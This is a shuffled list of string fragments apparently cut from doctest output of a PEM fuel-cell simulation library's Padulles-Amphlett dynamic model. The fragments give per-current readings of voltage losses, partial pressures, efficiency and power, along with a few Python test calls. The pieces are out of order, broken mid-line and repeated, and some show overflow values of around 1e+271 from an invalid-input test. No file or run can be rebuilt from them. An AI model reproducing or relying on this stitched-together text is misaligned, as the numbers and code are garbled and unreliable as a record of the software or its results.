0.24218164709816473 atm PO2 : 0.19039631633054707 atm", "V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic", "E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204", "V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power :", "0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration :", ": 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V", ": 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V", "V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power :", "0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808", ": The value of I(>0.1) leads to minus amount of V, please check", "Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic :", "Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V", "V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power :", ": 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O :", "PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E", ": 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O :", ": 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2", ": 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 :", "Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094", "0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC", "I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta", "FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm", "########### Analyzing . . . I : 0.1 E : 6.0684154992732005 V Eta", "atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W", ": 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration", "Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O", "E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357", "6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta", "PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ###########", "FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885", "FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969", "Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595", "I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta", "4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218", "V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm", "V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm", "I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta", "Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1", "0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979", "E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815", "FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723", ": 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I", "V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic", "2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 :", "V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm", ": 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 :", ": 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V", "V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm", "atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V", "V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency", "atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W", ": 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta Activation", "Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)", "2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration :", "0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC", "atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W", "E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05", "0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC", "Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857", ": 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC", "1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage", "atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6", "6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta", ": 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I", "Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2", "Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta", "atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0", "Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V", "FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157", "Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V", "0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC", "4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288", ": 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 :", "PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E", "6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta", ": 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration", "3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493", "0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403", "FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199", "Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2", "import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing .", "0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098", "FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348", ": 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC", ": 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration", ": 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I", "FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167", "atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196 V", "Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W", ": 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I", "PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal", ": 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss", "7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta Activation :", "0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I :", "Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463", ": 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E :", "0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC", "E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589", ": 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V", "0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC", "Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012", "W ########### I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118", "0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power", "PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal", "1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration :", "W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216", "PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E", "Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V", ": 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2", ": 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E :", "4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358", "Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2", ": 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC", "0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage", "0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage", "2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064", "0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I :", "0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I :", ": 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 :", "0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC", ": 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta Activation", ": 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I", "PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal", ": 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I", ": 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I", "Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704", "atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning : The", "PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ###########", "0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523", "PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ###########", "V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic", ": 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2", "1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta Activation :", "E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073", "Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V", "0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I :", "0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I :", "0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta Activation :", "0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage", "0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage : 4.079852105493149 V Loss :", ": 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal :", "PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal", "0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I :", "V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage :", ": 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 :", "Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087", "PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ###########", "Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic :", "0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC", "Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency :", "atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W", "FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186", "V Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic", ": 0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta Ohmic : 0.0060314264601405215 V", "W ########### Report is generating ... Warning : The value of I(>0.1) leads", ": 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I", "V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency", "Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W", "atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1", "atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W", "Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193", "PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal", "atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W", "W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872", "V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage :", "########### I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V", "Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V", "FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014", "V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm", "0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss :", "atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V", ">>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)", "PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E", "V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency", "PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E", "3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration :", "atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W", "0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power", ": 4.185910978067744 V Loss : 0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O :", "Simulation ########### Analyzing . . . I : 0.1 E : 6.0684154992732005 V", "PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ###########", "########### I : 3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V", ": 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration", "0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss :", "FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843", "9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage", ": 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V", "0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC", "0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862", ": 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E :", "atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W", "9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2 :", "E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05", "V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency", "0.3764959824754877 V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503", ": 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E :", "Ohmic : 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W", ": 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC", ": 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC", "PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ###########", "E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485", "Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency :", "0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I :", "########### I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V", "0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC", "Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061 V Eta Ohmic :", "V Loss : 0.40072369519096346 V PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm", "V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic", ": 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC", ": 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC", "W ########### I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093", "W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875", ": 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration", "V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm", ": 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC", "0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I :", ">>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>>", "atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8", "Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O", "Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348", ": 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O :", ": 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC", "########### I : 3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V", "0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss :", ": 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V", "atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7", ": 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V", "0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152", "4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931", "FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378", "Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488", "FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm", ": 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC", "E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145", "E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05", "6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta", "0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725 V Loss :", "Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043", "PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E", "1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration :", "N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . .", "V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency", ": 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I", "FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485", ": 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2", "V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm", "W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429", "Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V", ": 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V", "0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E : 6.068383196823811", "Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W", ": 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V", ": 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal :", "6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 :", "PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ###########", "Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency :", ": 2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration", ": 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2 :", ": 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518 V Eta Concentration", "atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W", "Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing .", ": 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss", "W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127", "W ########### I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945", "is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6", ": 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095 V Eta Activation", "Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V", "4.129118574087805 V Loss : 